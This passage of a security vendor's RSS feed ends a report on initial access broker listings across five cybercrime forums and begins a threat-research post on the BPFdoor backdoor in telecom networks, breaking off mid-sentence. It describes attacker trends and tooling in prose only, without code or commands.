is sold with either Domain User or Domain Admin.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>If we compare the numbers of the top 5 access types offered for sale to last year’s data, we can see that RDP access has become more prevalent than VPN, although both access types remain the leading two categories. In addition, it seems that RDweb is much more popular among the sellers.</span></p><p><span style='font-size: undefined;'></span></p><figure style="margin: 0"><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blte1c6ebd035a27160/69cbbd2cb4aabbb503a19874/image1.png" class="embedded-asset" content-type-uid="sys_assets" type="asset" alt="image1.png" asset-alt="image1.png" style="width: auto" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blte1c6ebd035a27160/69cbbd2cb4aabbb503a19874/image1.png" data-sys-asset-uid="blte1c6ebd035a27160" data-sys-asset-filename="image1.png" data-sys-asset-contenttype="image/png" data-sys-asset-alt="image1.png" sys-style-type="display"/></figure><p>⠀</p><p style="direction: ltr;"><span style='font-size: undefined;'>As for the privilege types, the clear dominance of the Domain User privilege offered for sale has declined, though it remains the most common privilege type sold by IABs. In addition, the newer dataset lacks any mentions of the Local User privilege. The data indicates a decline in the previously dominant Domain User access offering. Despite this decrease, Domain User access remains the most frequently sold privilege level among Initial Access Brokers (IABs). Notably, the updated dataset contains no instances of Local User privilege sales.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>This shift likely reflects evolving IAB monetization strategies and changing buyer demand. While Domain User access remains valuable for its broad network reach, its reduced dominance may signal heightened market competition, stronger defensive controls, or strategic diversification into alternative access types. The complete absence of Local User privileges suggests diminishing operational relevance and limited resale value, as threat actors increasingly prioritize access that facilitates lateral movement, privilege escalation, and rapid operational impact.</span></p><p><span style='font-size: undefined;'></span></p><figure style="margin: 0"><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/bltd8cd05876fe84c24/69cbbd2cbf93fc2e42359494/image6.png" class="embedded-asset" content-type-uid="sys_assets" type="asset" alt="image6.png" asset-alt="image6.png" style="width: auto" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/bltd8cd05876fe84c24/69cbbd2cbf93fc2e42359494/image6.png" data-sys-asset-uid="bltd8cd05876fe84c24" data-sys-asset-filename="image6.png" data-sys-asset-contenttype="image/png" data-sys-asset-alt="image6.png" sys-style-type="display"/></figure><p>⠀</p><p style="direction: ltr;"><span style='font-size: undefined;'>Additionally, in RAMP, we observed an exploit targeting a vulnerability in the Oracle E-Business Suite (CVE-2025-61882) being offered for sale.</span></p><p>⠀</p><figure style="margin: 0"><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt9b9c02b068e1f3e8/69cbbd2c6e737ff7bece0bda/image8.png" class="embedded-asset" content-type-uid="sys_assets" type="asset" alt="image8.png" asset-alt="image8.png" style="width: auto" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt9b9c02b068e1f3e8/69cbbd2c6e737ff7bece0bda/image8.png" data-sys-asset-uid="blt9b9c02b068e1f3e8" data-sys-asset-filename="image8.png" data-sys-asset-contenttype="image/png" data-sys-asset-alt="image8.png" sys-style-type="display"/></figure><p>⠀</p><p style="direction: ltr;"><span style='color:rgb(31, 31, 31);font-size: undefined;'>CVE-2025-61882 is a critical vulnerability in Oracle E-Business Suite (versions 12.2.3–12.2.14). This flaw allows unauthenticated attackers to execute arbitrary code via HTTP, resulting in complete system compromise.</span></p><p style="direction: ltr;"><span style='color:rgb(31, 31, 31);font-size: undefined;'>The vulnerability has been exploited as a zero-day by the Cl0p criminal organization to exfiltrate financial and human resources data for subsequent extortion attempts, as documented in the </span><a href="https://www.rapid7.com/blog/post/etr-cve-2025-61882-critical-0day-in-oracle-e-business-suite-exploited-in-the-wild/" target="_blank"><span style='font-size: undefined;'>Rapid7 blog</span></a><span style='color:rgb(31, 31, 31);font-size: undefined;'>.</span></p><h3 style="direction: ltr;"><span style='color:rgb(67, 67, 67);'>Demographic information</span></h3><p style="direction: ltr;"><span style='font-size: undefined;'>A comprehensive analysis of the underground market for illicit network access points reveals that most available listings concern networks in the United States, totaling 155 unique listings. </span></p><p style="direction: ltr;"><span style='font-size: undefined;'>This substantial figure constitutes a significant 30.9% of the total global data on illicit network access available for purchase. The dominance of the U.S. in this domain suggests a confluence of factors, including the sheer size and connectivity of its network infrastructure, the high value associated with compromised U.S. enterprise and government networks, and the relative wealth of potential buyers seeking access to these environments. The visibility of U.S.-based access points on darknet marketplaces underscores a considerable vulnerability and highlights the attractiveness of U.S. targets to cybercriminal syndicates seeking initial access for subsequent malicious activities such as data exfiltration, ransomware deployment, or espionage.</span></p><p><span style='font-size: undefined;'></span></p><figure style="margin: 0"><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt1df85eb5b748fb95/69cbbd2d0ba58f28839c7507/image12.png" class="embedded-asset" content-type-uid="sys_assets" type="asset" alt="image12.png" asset-alt="image12.png" style="width: auto" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt1df85eb5b748fb95/69cbbd2d0ba58f28839c7507/image12.png" data-sys-asset-uid="blt1df85eb5b748fb95" data-sys-asset-filename="image12.png" data-sys-asset-contenttype="image/png" data-sys-asset-alt="image12.png" sys-style-type="display"/></figure><p>⠀</p><p style="direction: ltr;"><span style='font-size: undefined;'>The top 10 targeted countries list is very similar to the one from last year, which also placed the United States at the top, with a large margin from the following countries (the United Kingdom, India, and Brazil).</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>In addition, an analysis of the offerings indicates a pronounced concentration on particular sectors. The government sector is the most frequently targeted category, accounting for 14.2% of the observed offerings, likely due to the substantial value of sensitive data held. The retail industry closely follows at 13.1%, attracting IABs due to the presence of payment card information (PCI) and personally identifiable information (PII). The Information Technology (IT) sector is the third most frequent target, at 10.8%, valued for its potential as a supply chain vector to compromise a wide range of clients.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>This strategic focus on Government, Retail, and IT underscores the IAB community's prioritization of targets that promise the greatest financial return, intelligence acquisition, or potential for systemic disruption.</span></p><p><span style='font-size: undefined;'></span></p><figure style="margin: 0"><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt04d400eb9e97ecb1/69cbbd2c61d7a54382ef0ba8/image11.png" class="embedded-asset" content-type-uid="sys_assets" type="asset" alt="image11.png" asset-alt="image11.png" style="width: auto" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt04d400eb9e97ecb1/69cbbd2c61d7a54382ef0ba8/image11.png" data-sys-asset-uid="blt04d400eb9e97ecb1" data-sys-asset-filename="image11.png" data-sys-asset-contenttype="image/png" data-sys-asset-alt="image11.png" sys-style-type="display"/></figure><p>⠀</p><p style="direction: ltr;"><span style='font-size: undefined;'>Unlike the top 10 countries list, the top 10 targeted sectors list is very different from last year’s, which was dominated by the Financial Services and IT sectors, with few network access offerings from organizations in the Government and Retail sectors. This is likely due to the inclusion of DarkForums in this year’s analysis, which usually contain many sellers offering access to government networks.</span></p><p><span style='font-size: undefined;'></span></p><figure style="margin: 0"><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/bltb342c8fa65fbecae/69cbbd2c41486088dfec8116/image9.png" class="embedded-asset" content-type-uid="sys_assets" type="asset" alt="image9.png" asset-alt="image9.png" style="width: auto" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/bltb342c8fa65fbecae/69cbbd2c41486088dfec8116/image9.png" data-sys-asset-uid="bltb342c8fa65fbecae" data-sys-asset-filename="image9.png" data-sys-asset-contenttype="image/png" data-sys-asset-alt="image9.png" sys-style-type="display"/></figure><h2>Individual analysis of Exploit, XSS, DarkForums, BreachForums, and RAMP</h2><p style="direction: ltr;"><span style='font-size: undefined;'>The following is a detailed, individual analysis of the five forums, covering their history, operations, and key trends from the latter half of 2025. This includes an examination of common illicit listings, typical base price ranges, and frequently targeted regions.</span></p><h3 style="direction: ltr;">Exploit</h3><p style="direction: ltr;"><span style='font-size: undefined;'>Exploit has continued to function as one of the most technically rigorous Russian-language cybercrime forums. Historically focused on exploits, malware development, and high-end IAB offerings, Exploit has maintained a comparatively stable operational posture over the past two years. While selectively restricting access and tightening vetting following multiple international law enforcement takedowns of peer forums, Exploit has benefited from its long-standing reputation system and senior moderator structure. Between 2024 and 2026, it increasingly served as a venue for enterprise network access, VPN, and EDR-bypassed footholds, and post-exploitation tooling, rather than commodity credential sales.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>Unlike last year’s offerings that focused on RDP access, the H2 2025 data shows that Exploit’s IABs are more focused on RDweb. The shift from RDP access to RDWeb access in H2 2025 is likely due to improved defenses against direct exposure to the RDP protocol. Faced with reduced capabilities to secure or remove RDP access points exposed to the internet, attackers are adapting by targeting RDWeb portals, which are often vulnerable and sometimes less well-protected. RDWeb offers reliable access to enterprise environments, making it an attractive alternative for initial access brokers. The United States remains the most targeted country, accounting for approximately 40% of cases in which the organization’s location is specified.</span></p><p></p><figure style="margin: 0"><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt2bcb1316b4b12cf3/69cbbd2c23883dae2b0aaf3b/image7.png" class="embedded-asset" content-type-uid="sys_assets" type="asset" alt="image7.png" asset-alt="image7.png" style="width: auto" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt2bcb1316b4b12cf3/69cbbd2c23883dae2b0aaf3b/image7.png" data-sys-asset-uid="blt2bcb1316b4b12cf3" data-sys-asset-filename="image7.png" data-sys-asset-contenttype="image/png" data-sys-asset-alt="image7.png" sys-style-type="display"/></figure><p>⠀</p><p style="direction: ltr;"><span style='font-size: undefined;'>Interestingly, while the average alleged revenue of the targeted organizations dropped from approximately $314 million to only $58 million, the base price of the offerings has gone 6 times higher than last year.</span></p><h3 style="direction: ltr;">BreachForums (AKA Breached)</h3><p style="direction: ltr;"><span style='font-size: undefined;'>BreachForums has experienced the most visible volatility. Following multiple seizures and arrests in 2023–2024, the forum underwent several reboots under new administrators, each attempting to inherit the brand equity of the original platform. By 2025, BreachForums had largely reestablished itself as a data-leak-centric marketplace, with less emphasis on technical exploitation and a greater focus on breached databases, stealer logs, and extortion-related disclosure tactics. Trust erosion from repeated compromises, however, pushed higher-tier IABs and ransomware affiliates toward more closed or Russian-language platforms, reducing BreachForums’ role in elite access brokerage by 2026.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>The precarious status of the Breached forum, as it is now called, is reflected by the number of IAB threads found this year (around 52% less than in 2024). This is likely due to the disappearance of very dominant players in the IAB community, such as IntelBroker (real name: Kai West), who was apprehended by law enforcement and charged in the U.S. with his crimes. Accordingly, the variety of access types was much more limited, dominated by remote code execution (RCE) and Shell access. However, unlike last year, which included only Domain Admin, this year we noticed additional privilege types offered: Domain User and Local Admin.   </span></p><p><span style='font-size: undefined;'></span></p><figure style="margin: 0"><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/bltd169a4905c91ca4c/69cbbd2dc703bfd3471d7a40/image4.png" height="743" class="embedded-asset" content-type-uid="sys_assets" type="asset" alt="image4.png" asset-alt="image4.png" width="1201" max-width="1201" max-height="743" style="max-width: 1201px; width: 1201px; max-height: 743px; height: 743px" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/bltd169a4905c91ca4c/69cbbd2dc703bfd3471d7a40/image4.png" data-sys-asset-uid="bltd169a4905c91ca4c" data-sys-asset-filename="image4.png" data-sys-asset-contenttype="image/png" data-sys-asset-alt="image4.png" sys-style-type="display"/></figure><p>⠀</p><p style="direction: ltr;"><span style='font-size: undefined;'>Just like in the other examined forums, the United States is the most targeted country (17.4%) in Breached, but by a substantially smaller percentage compared to last year.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>As for the pricing, we see an opposite trend compared to Exploit - while the average alleged revenue of the targeted organizations has slightly increased in 2025, the base price of the offerings in Breached was cut in half.</span></p><h3 style="direction: ltr;">XSS (formerly DaMaGeLaB)</h3><p style="direction: ltr;"><span style='font-size: undefined;'>XSS has retained its status as a premier Russian-language forum for initial access sales, ransomware partnerships, and credentialed access to corporate environments. Following intermittent downtime and administrator turnover in 2024, XSS emerged in 2025 with reinforced operational security practices and stricter membership controls. Over the past two years, XSS has increasingly served as a coordination hub for post-access collaboration, including handoffs between IABs, ransomware operators, and data theft specialists. Pricing trends observed on XSS indicate a shift toward higher-value, lower-volume access, particularly in Western enterprise environments.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>Compared to last year's assessment, this forum showed the most significant shift. It went from being the most dominant forum for IAB threads to the lowest among the five forums we examined. In H2 of 2025, we only located around 20 threads (compared to almost 200 in 2024). This small number of threads makes XSS stats so statistically negligible as to be unanalyzable. This decline is likely due to many IABs shifting to newer, “shinier” cybercrime forums, such as DarkForums and RAMP. </span></p><h3 style="direction: ltr;">DarkForums</h3><p style="direction: ltr;"><span style='font-size: undefined;'>DarkForums rose to prominence as an English-language alternative following repeated disruptions to BreachForums. Between 2024 and 2026, DarkForums positioned itself as a hybrid marketplace, blending breach data sales, low- to mid-tier IAB offerings, and fraud services. While it lacks the technical depth of Exploit or XSS, DarkForums has become a key on-ramp for emerging actors, especially those operating stealer malware or reselling access obtained using phishing and MFA fatigue attacks. Its relatively open registration model has resulted in higher signal-to-noise ratios, but it remains valuable for tracking early-stage monetization trends.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>DarkForums is one of the two new forums that were included in this year’s analysis, and the most dominant in terms of IAB threads. It had a somewhat unique access type, leading the board, Fortinet, followed by SSH, RDP, and Root access. The Fortinet access points were predominantly sold by a very active DarkForums user, BigBro. Interestingly, we also found another user, Big-Bro, active on RAMP, who is likely the same user, although selling different types of access points.</span></p><p></p><figure style="margin: 0"><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt2e90fd1219ce2031/69cbbd2c1604ee8fdb873fae/image2.png" height="743" class="embedded-asset" content-type-uid="sys_assets" type="asset" alt="image2.png" asset-alt="image2.png" width="1201" max-width="1201" max-height="743" style="max-width: 1201px; width: 1201px; max-height: 743px; height: 743px" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt2e90fd1219ce2031/69cbbd2c1604ee8fdb873fae/image2.png" data-sys-asset-uid="blt2e90fd1219ce2031" data-sys-asset-filename="image2.png" data-sys-asset-contenttype="image/png" data-sys-asset-alt="image2.png" sys-style-type="display"/></figure><p></p><p>⠀</p><p style="direction: ltr;"><span style='font-size: undefined;'>Similar to the other forums, the most targeted country on DarkForums was the United States (25.8%); however, unlike the others, many of the network access offerings were from organizations in the Government and Retail sectors. </span></p><p style="direction: ltr;"><span style='font-size: undefined;'>As for the pricing, DarkForums had the highest average of alleged targeted organization revenue and offering base price by a very large margin compared to the rest. </span></p><h3 style="direction: ltr;">RAMP (Russian Anonymous Marketplace)</h3><p style="direction: ltr;"><span style='font-size: undefined;'>RAMP has continued to operate as a high-trust, invite-only ecosystem following its resurgence after earlier disruptions by law enforcement. By 2025–2026, RAMP solidified its role as a convergence point for ransomware affiliates, IABs, and cash-out services, rather than a general discussion forum. RAMP listings observed during this period emphasized full domain access, long-term persistence, and revenue-sharing models, reflecting a mature, partnership-driven cybercrime economy. Its closed nature limits visibility, but the activity that does surface suggests alignment with the most operationally sophisticated threat actors.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>RAMP was another newly examined forum and the second-highest in terms of IAB threads. The most dominant type of access being sold by RAMP’s IABs was RDP, followed by VPN and Citrix by a large margin. The most common privilege types for sale were Domain User (56.4%) and Domain Admin (33.9%). Notably, most of the threads that were analyzed for this forum (78.8%) belonged to only two users, Big-Bro (mentioned earlier) and an allegedly Albanian user, lacrim.   </span></p><p><span style='font-size: undefined;'></span></p><figure style="margin: 0"><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt6b6b6c6f93d27be3/69cbbd2cc703bfc44c1d7a3c/image10.png" class="embedded-asset" content-type-uid="sys_assets" type="asset" alt="image10.png" asset-alt="image10.png" style="width: auto" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt6b6b6c6f93d27be3/69cbbd2cc703bfc44c1d7a3c/image10.png" data-sys-asset-uid="blt6b6b6c6f93d27be3" data-sys-asset-filename="image10.png" data-sys-asset-contenttype="image/png" data-sys-asset-alt="image10.png" sys-style-type="display"/></figure><p>⠀</p><p style="direction: ltr;"><span style='font-size: undefined;'>In RAMP, the United States continued to lead the list of targeted countries (36.5%). The average alleged targeted organization revenue was approximately $440 million, and the average base price was almost $6400. </span></p><h2 style="direction: ltr;">Threat actors active across multiple forums</h2><p style="direction: ltr;"><span style='font-size: undefined;'>This research revealed that a subset of threat actors maintains an active presence across multiple forums, with the greatest overlap observed between Breached and DarkForums. This overlap is understandable, since DarkForums was intentionally designed as a "spiritual successor" and a like-for-like replacement for Breached following the latter's frequent law-enforcement disruptions. Consequently, the two platforms share a nearly identical visual and structural layout, both utilizing the MyBB forum software to create a familiar environment for users.</span></p><p><span style='font-size: undefined;'></span></p><figure style="margin: 0"><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt5cb6e9df792ede9a/69cbbd2dbf93fc461a359498/image13.png" height="550" class="embedded-asset" content-type-uid="sys_assets" type="asset" alt="image13.png" asset-alt="image13.png" width="996" max-width="996" max-height="550" style="max-width: 996px; width: 996px; max-height: 550px; height: 550px" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt5cb6e9df792ede9a/69cbbd2dbf93fc461a359498/image13.png" data-sys-asset-uid="blt5cb6e9df792ede9a" data-sys-asset-filename="image13.png" data-sys-asset-contenttype="image/png" data-sys-asset-alt="image13.png" sys-style-type="display"/></figure><h2>Recommendations</h2><p style="direction: ltr;"><span style='font-size: undefined;'>No security strategy can remain static. Policy frameworks and compliance controls alone are insufficient. Continuous monitoring of real-world access behavior is essential. Anomalous logins, unexpected privilege escalations, access outside normal business hours, or activity from unfamiliar locations should be treated as early indicators of compromise.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>Proactive threat intelligence further enables defenders to anticipate which access methods are most likely to be targeted. An effective defense requires making stolen access difficult to exploit. Enforcing least-privilege principles, tightly controlling administrative rights, hardening remote access services with MFA, and accelerating intrusion detection all materially limit an attacker’s ability to escalate and persist. While breaches may still occur, rapid identification and containment can prevent them from becoming full-scale incidents. Organizations that evolve their defenses in step with access brokers can erode the attackers’ advantage, increasing the cost and reducing the effectiveness of cybercrime.</span></p><h2>Conclusion</h2><p style="direction: ltr;"><span style='font-size: undefined;'>The comparison between 2024 and 2025 highlights how initial access brokers continue to adapt to increasingly robust defensive measures. As organizations strengthen their security postures, attackers refine the types of access they steal and monetize to maintain effectiveness. In 2025, high-privilege credentials, such as domain or local administrator accounts, will command greater value because they enable rapid lateral movement and immediate operational impact, leaving defenders little time to detect and respond. Lower-privilege access is steadily losing value, signaling a clear shift from volume-driven access sales to a focus on quality and impact. Access vectors are evolving in parallel. As VPN infrastructure becomes more hardened and closely monitored, attackers are pivoting to RDP, RDWeb, and SSH services that are operationally critical, widely exposed, and often subject to less rigorous scrutiny. This shift reflects a pragmatic path-of-least-resistance strategy rather than any decline in attacker sophistication.</span></p>]]></description>
      <link>https://www.rapid7.com/blog/post/tr-initial-access-broker-shift-high-value-targets-premium-pricing</link>
      <guid isPermaLink="false">bltca8285ebeee77149</guid>
      <category><![CDATA[Labs]]></category>
      <category><![CDATA[Phishing]]></category>
      <category><![CDATA[Dark Web]]></category><dc:creator><![CDATA[Rapid7 Labs]]></dc:creator>
      <pubDate>Tue, 31 Mar 2026 13:00:00 GMT</pubDate><media:content url="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/bltf3ae6fb8e07d88e0/67ee88468d0b99031be0ea84/resources-research.jpg" medium="image" />
    </item>
    <item>
      <title><![CDATA[BPFdoor in Telecom Networks: Sleeper Cells in the Backbone]]></title>
      <description><![CDATA[<h2>Executive overview</h2><h4><span style='color:rgb(102, 102, 102);'><em>The strategic positioning of covert access within the world’s telecommunication networks</em></span></h4><p style="direction: ltr;"><span style='font-size: undefined;'>A months-long investigation by Rapid7 Labs has uncovered evidence of an advanced China-nexus threat actor, Red Menshen, placing some of the stealthiest digital sleeper cells the team has ever seen in telecommunications networks. The goal of these campaigns is to carry out high-level espionage, including against government networks.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>Telecommunications networks are the central nervous system of the digital world. They carry government communications, coordinate critical industries, and underpin the digital identities of billions of people. When these networks are compromised, the consequences extend far beyond a single provider or region. That level of access is, and should be, a national concern as it compromises not just one company or organization, but the communications of entire populations.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>Over the past decade, telecom intrusions have been reported across multiple countries. In several cases, state-backed actors accessed call detail records, monitored sensitive communications, and exploited trusted interconnections between operators. While these incidents often appear isolated, a broader pattern is emerging.</span></p><h3>Why telecom networks are strategic espionage targets</h3><p style="direction: ltr;"><span style='font-size: undefined;'>Telecommunications infrastructure provides a uniquely valuable strategic positioning.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>Modern telecom networks are layered ecosystems composed of routing systems, subscriber management platforms, authentication services, billing systems, roaming databases, and lawful intercept capabilities. These systems rely on specialized signaling protocols such as SS7, Diameter, and SCTP to coordinate identity, mobility, and connectivity across national and international boundaries.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>Persistent access within these environments enables far more than a conventional data breach. An adversary positioned inside the telecom core may gain visibility into subscriber identifiers, signaling flows, authentication exchanges, mobility events, and communications metadata. In the most concerning scenarios, this level of access could support long-term intelligence collection, large-scale subscriber tracking, and monitoring of sensitive communications involving high-value geopolitical targets.</span></p><p>Telecommunications networks sit at the intersection of identity, mobility, and global connectivity. Compromise at this layer carries national and international implications.</p><h3>A structured campaign, not isolated incidents</h3><p style="direction: ltr;"><span style='font-size: undefined;'>What looks like discrete breaches increasingly resembles a repeatable campaign model designed to establish persistent access inside telecommunications infrastructure.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>Our investigation uncovered a long-term and ongoing operation attributed to a China-nexus threat actor. Rather than conducting short-term intrusion activity, the operators appear focused on long-term positioning by embedding stealthy access mechanisms deep inside telecom and critical environments and maintaining them for extended periods.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>In effect, attackers are placing sleeper cells inside the telecom backbone: dormant footholds positioned well in advance of operational use.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>Across investigations and public reporting, we observe recurring elements: kernel-level implants, passive backdoors, credential-harvesting utilities, and cross-platform command frameworks. Together, these components form a persistent access layer designed not simply to breach networks, but to inhabit them.</span></p><p><span style='font-size: undefined;'></span></p><figure style="margin: 0"><div style="display: inline-block"><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt6f617bb490e2bc04/69c3f3768b8bd3940f448a94/Actors-tools-regions-graph-threat-groups-telecom-sector.png" alt="Actors-tools-regions-graph-threat-groups-telecom-sector.png" caption="Figure 1: Actors, tools and regions in which specific threat groups target the telecom sector" class="embedded-asset" content-type-uid="sys_assets" type="asset" asset-alt="Actors-tools-regions-graph-threat-groups-telecom-sector.png" style="width: auto" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt6f617bb490e2bc04/69c3f3768b8bd3940f448a94/Actors-tools-regions-graph-threat-groups-telecom-sector.png" data-sys-asset-uid="blt6f617bb490e2bc04" data-sys-asset-filename="Actors-tools-regions-graph-threat-groups-telecom-sector.png" data-sys-asset-contenttype="image/png" data-sys-asset-caption="Figure 1: Actors, tools and regions in which specific threat groups target the telecom sector" data-sys-asset-alt="Actors-tools-regions-graph-threat-groups-telecom-sector.png" data-sys-asset-position="none" sys-style-type="display"/><figcaption style="text-align:center">Figure 1: Actors, tools and regions in which specific threat groups target the telecom sector</figcaption></div></figure><h3>How BPFdoor enables covert, deep-seated persistence</h3><p style="direction: ltr;"><span style='font-size: undefined;'>At the center of this activity is BPFdoor, a stealth Linux backdoor engineered to operate within the operating system kernel.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>Unlike conventional malware, BPFdoor does not expose listening ports or maintain visible command-and-control channels. Instead, it abuses Berkeley Packet Filter (BPF) functionality to inspect network traffic directly inside the kernel, activating only when it receives a specifically- crafted trigger packet. There is no persistent listener or obvious beaconing. The result is a hidden trapdoor embedded within the operating system itself.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>This approach represents a shift in stealth tradecraft. By positioning below many traditional visibility layers, the implant significantly complicates detection, even when defenders know what to look for.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>Our research indicates BPFdoor is not an isolated tool, but part of a broader intrusion model targeting telecom environments at scale.</span></p><h3>How attackers gain initial access to telecom environments</h3><p style="direction: ltr;"><span style='font-size: undefined;'>These findings reflect a broader evolution in adversary tradecraft. Attackers are embedding implants deeper into the computing stack — targeting operating system kernels and infrastructure platforms rather than relying solely on user-space malware.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>Telecom environments — combining bare-metal systems, virtualization layers, high-performance appliances, and containerized 4G/5G core components — provide ideal terrain for low-noise, long-term persistence. By blending into legitimate hardware services and container runtimes, implants can evade traditional endpoint monitoring and remain undetected for extended periods.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>For defenders, the implications are significant. Many organizations lack visibility into kernel-level operations, raw packet-filtering behavior, and anomalous high-port network activity on Linux systems. Addressing this threat requires expanding defensive visibility beyond the traditional perimeter to include deeper inspection of operating system behavior and infrastructure layers.</span></p><h3>Sharing intelligence responsibly</h3><p style="direction: ltr;"><span style='font-size: undefined;'>Our investigation to identify potential victims is ongoing and, where potential compromise has been discovered, we have notified affected parties through relevant authorities or direct communication with our customers.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>As part of our responsible research process, we have collaborated with government partners and national CERTs to share findings and indicators associated with this activity. When our analysis identified infrastructure that may have been impacted, we proactively notified the relevant organizations and provided detection guidance to assist with investigation and response while the research was still underway.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>Rapid7 Intelligence Hub customers have access to the full technical details and indicators of compromise within the platform, including Surricata rules. Those rules are also available through AWS Marketplace, where we offer our curated AWS firewall rule sets. </span></p><h2>Technical analysis</h2><p style="direction: ltr;"><span style='font-size: undefined;'>The sections that follow examine how modern telecommunications networks are structured, how initial access is established, and how BPFdoor and related tooling enable infrastructure-level persistence inside the telecom backbone.</span></p><h3>Modern telecom network structure</h3><p style="direction: ltr;"><span style='font-size: undefined;'>To understand why telecom environments are such attractive strategic targets, it helps to visualize their layered architecture (Figure 2). At the outer edge sit customer-facing services and access infrastructure: mobile base stations (RAN), fiber aggregation routers, broadband gateways, DNS services, SMS-controllers, roaming gateways, security appliances like firewalls, proxies, VPNs, and internet peering points. These edge systems connect into the operator’s IP core and transport backbone, where high-capacity routers and switches move massive volumes of voice, data, and signaling traffic across regions and international borders.</span></p><p></p><figure style="margin: 0"><div style="display: inline-block"><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt9519f81496317642/69c3f4fd2c37652fa2e5f604/Telecom-provider-network-rapid7-chart.png" height="816" alt="Telecom-provider-network-rapid7-chart.png" caption="Figure 2: Simplified version of a telecom provider’s network" class="embedded-asset" content-type-uid="sys_assets" type="asset" asset-alt="Telecom-provider-network-rapid7-chart.png" width="1223" style="width: 1223px; height: 816px" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt9519f81496317642/69c3f4fd2c37652fa2e5f604/Telecom-provider-network-rapid7-chart.png" data-sys-asset-uid="blt9519f81496317642" data-sys-asset-filename="Telecom-provider-network-rapid7-chart.png" data-sys-asset-contenttype="image/png" data-sys-asset-caption="Figure 2: Simplified version of a telecom provider’s network" data-sys-asset-alt="Telecom-provider-network-rapid7-chart.png" data-sys-asset-position="none" sys-style-type="display"/><figcaption style="text-align:center">Figure 2: Simplified version of a telecom provider’s network</figcaption></div></figure><p>⠀</p><p style="direction: ltr;"><span style='font-size: undefined;'>Deeper inside lies the control plane, the heart of the telecom network, built around subscriber management systems such as HLR/HSS or UDM, authentication platforms (AuC), policy control functions, billing systems, lawful intercept platforms, and roaming databases. These systems communicate using specialized telecom signaling protocols such as SS7, Diameter, and increasingly SCTP-based signaling for LTE and 5G core components. At the foundation, much of this infrastructure ultimately runs on hardened, but often standard, Linux or BSD-based bare-metal servers, virtualization stacks, and high-performance network appliances. When an adversary implants a persistent backdoor at the kernel level within these environments, they are not simply compromising a server, they are positioning themselves adjacent to subscriber data, signaling flows, and the mechanisms that authenticate and route national and international communications.</span></p><h3>Initial access</h3><p style="direction: ltr;"><span style='font-size: undefined;'>Telecom intrusions rarely begin deep inside the core. Instead, attackers focus on exposed edge services and internet-facing infrastructure. Techniques such as exploitation of public-facing applications (T1190) and abuse of valid accounts (T1078) are repeatedly observed. Devices commonly targeted include: Ivanti Connect Secure VPN appliances, Cisco IOS and JunOS network devices, Fortinet firewalls, VMware ESXi hosts, Palo Alto appliances, and even web-facing platforms like Apache Struts. These systems sit at the boundary between external traffic and internal telecom environments, making them high-value entry points. Once compromised, they provide authenticated pathways into the provider’s network, often without triggering traditional endpoint detection mechanisms.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>Let’s highlight some of the tools we observed during initial access and attempt to get more credentials for lateral movement.</span></p><h4><span style='color:rgb(67, 67, 67);'>CrossC2</span></h4><p style="direction: ltr;"><span style='font-size: undefined;'>Once initial access is secured, the operators frequently deploy Linux-compatible beacon frameworks such as CrossC2. This Cobalt Strike-derived loader enables beacon functionality on Linux hosts and has been repeatedly observed in PRC-aligned intrusion campaigns. It provides the same post-exploitation capabilities traditionally seen in Windows environments, command execution, pivoting, staging, but tailored for Linux-heavy telecom infrastructure. CrossC2 allows operators to blend into server environments that form the backbone of telecom operations, particularly 